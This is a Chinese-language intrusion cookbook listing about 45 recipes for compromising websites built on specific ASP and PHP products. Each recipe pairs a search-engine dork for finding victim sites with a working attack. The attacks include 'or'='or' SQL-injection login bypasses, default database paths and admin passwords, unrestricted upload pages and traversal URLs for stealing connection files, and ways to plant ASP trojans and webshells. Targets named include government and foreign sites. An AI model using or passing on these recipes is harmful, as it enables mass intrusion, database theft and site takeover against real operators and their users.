1,到GoogLe,搜尋一些關鍵字,edit.asp? 韓國肉雞為多,多數為MSSQL資料庫!
2,
到Google ,site:cq.cn inurl:asp
3,
利用挖掘雞和一個ASP木馬.
檔案名稱是login.asp
路徑組是/manage/
關鍵詞是went.asp
用'or'='or'來登陸
4,
關鍵字:Co Net MIB Ver 1.0網站後台管理系統
帳號密碼為 'or'='or'
5.
動感購物系統
inurl:help.asp登陸,如未註冊成為會員!
upLoad_bm1.asp和upLoad_c1.asp這兩個隨便選個,一般管理員都忽視了這2漏洞
6。
預設資料庫地址blogdata/acblog.asa
關鍵字:acblog
7.
百度 /htdocs
註冊裡可以直接上傳asa檔案!
8.
/Database/#newasp.mdb
關鍵詞:NewAsp SiteManageSystem Version
9.
用挖掘機
關鍵字:Powered by WEBBOY
頁面:/upfile.asp
10.
baidu中搜尋索引鍵Ver5.0 Build 0519
(存在上傳漏洞)
11.
Upfile_Article.asp bbs/upfile.asp
輸入關鍵字:powered by mypower ,
12.
inurl:winnt\system32\inetsrv\ 在google裡面輸入這個就可以找到很多網站
13.
現在GOOGLE搜尋索引鍵 intitle:網站小助手 inurl:asp
14.
鍵字: 首頁 最新動向 新手指南 舞曲音樂 下載中心 經典文章 玩家風采 裝備購買 站內流言 友情串連 本站論壇
挖掘雞的關鍵字 添 setup.asp
15.
VBulletin論壇的資料庫
預設資料庫地址!
/includes/functions.php
工具:
1.網站獵手 :百度 Google!
2.Google
關鍵字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一個就可以了
16.
1.開啟百度或GOOGLE搜尋,輸入powered by comersus ASP shopping cart
open source。 這是一個商場系統。
2.網站的最底部分,有個 Comersus Open Technologies LC。開啟看下~~comersus系統~
猜到,comersus.mdb. 是資料庫名
資料庫都是放在database/ 後的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp換成database/comersus.mdb,不能下載。
那樣把前一個''store/''除去,再加上database/comersus.mdb 試試
17.
無憂傳奇官方網站程式。
1、後台管理地址:http://您的網域名稱/msmiradmin/
2、預設後台管理帳號:msmir
3、預設後台管理密碼:msmirmsmir
資料庫檔案為 http://您的網域名稱/msmirdata/msmirArticle.mdb
資料庫連接檔案為 ***********/Conn.asp
18.
百度裡輸入/skins/default/
19.
利用挖掘機
關鍵機:power by Discuz
路徑:/wish.php
配合:
Discuz!論壇 wish.php遠程包含漏洞 工具使用
20.
上傳漏洞.
工具 : Domain3.5
網站獵手 1.5版
關鍵字powered by mypower
檢測的頁面或檔案插入upfile_photo.asp
21.
新雲漏洞
這個漏洞ACCESS和SQL版通吃。
Google搜尋索引鍵 "關於本站 - 網站協助 - 廣告合作 - 下載聲明 - 友情串連 - 網站地圖 - 管理登入"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到網站根目錄。就可以下載conn.asp
以源碼,軟體等下載站居多。
大家時常碰到資料庫如果前面或者中間+了# 可以用%23替換就可以下載了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
22.
通吃所有商城+動力上傳系統
使用工具:挖掘雞 v1.1 明小子
商城入侵:
關鍵字:選購->加入購物車->去收銀台->確認收貨人資訊->選付款條件->選配送方式->線上支付或下單後匯款->匯款確認->發貨->完成
漏洞頁面:upload.asp
upfile_flash.asp
動力入侵:
關鍵字:powered by mypower
漏洞頁面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
注射漏洞
百度搜尋:oioj's blog
24
動易
列目錄
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
工具:網站獵手
關鍵詞:inurl:Went.asp
尾碼:manage/login.asp
口令:'or'='or'
26.
入侵魔獸私服
需要的工具:ASP木馬一隻。
Domain3.5明小子
關鍵字:All Right Reserved Design:遊戲聯盟
後台地址:admin/login.asp
資料庫的地址:chngame/#chngame.mdb
27.
漏洞是利用管理員iis設定的失誤
用baidu 關鍵字就是比較罕見的指令碼名
動網: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
動易: admin_articlerecyclebin.asp
28.
國外站的爆庫漏洞
關鍵字:sad Raven's Guestbook
密碼地址:/passwd.dat
後台地址:/admin.php
29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP瀏覽器
2,WAP編碼轉換器
關鍵字:"intext:Discuz! 4.1.0"
30.
關鍵字:尚奈克斯
後台路徑/system/manage.asp
直接傳ASP木馬
31.
工具
1:網站獵手
2:大馬一個
關鍵字:切勿關閉Cookies功能,否則您將不能登入
插入diy.asp
32.
關鍵字:Team5 Studio All rights reserved
預設資料庫:data/team.mdb
33.
工具: 挖掘機 輔臣資料庫讀取器
關鍵字: 企業簡介 產品展示 產品列表
尾碼添加: /database/myszw.mdb
後台地址: admin/Login.asp
34.
關鍵子 XXX inurl:Nclass.asp
在"系統設定"裡寫個木馬。
會被儲存到 在 config.asp內。
35.
不進後台照樣拿動網WEBSHELL
data.asp?action=BackupData 動網Database Backup預設路徑
36.
工具:網站獵手 WebShell
關鍵字:inurl:Went.asp
尾碼:manage/login.asp
弱口令:'or'='or'
37.
關鍵字:Powered by:QCDN_NEWS
隨便掃遍文章加一個' ,來試探注入點
後台地址:admin_index.asp
38.
入侵雷池新聞發布系統
關鍵字:leichinews
去掉leichinews後面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上傳馬.....
進訪問uppic anran.asp 登陸馬.
39.
關鍵字:Power System Of Article Management Ver 3.0 Build 20030628
預設資料庫:database\yiuwekdsodksldfslwifds.mdb
後台地址:自己掃描!
40.
一、通過GOOGLE搜尋找大量注入點
關鍵字:asp?id=1 gov.jp/ asp?id=
頁數:100
語言:想入侵哪個國家就填什麼語言吧
41.
關鍵字:Powered by:94KKBBS 2005
利用密碼找回功能 找回admin
提問:ddddd 回答:ddddd
42.
關鍵字:inurl:Went.asp
後台為manage/login.asp
後台密碼: 'or'=' 或者 'or''=''or' 登入 進入
預設資料庫地址:Database/DataShop.mdb
43.
關鍵字:****** inurl:readnews.asp
把最後一個/改成%5c ,直接暴庫,看密碼,進後台
隨便添加個新聞 在標題輸入我們的一句話木馬
44.
工具:一句話木馬
BBsXp 5.0 sp1 管理員猜解器
關鍵詞:powered by bbsxp5.00
進後台,備份一句話馬!
45.
關鍵字:程式核心:BJXSHOP網上開店專家
後台:/admin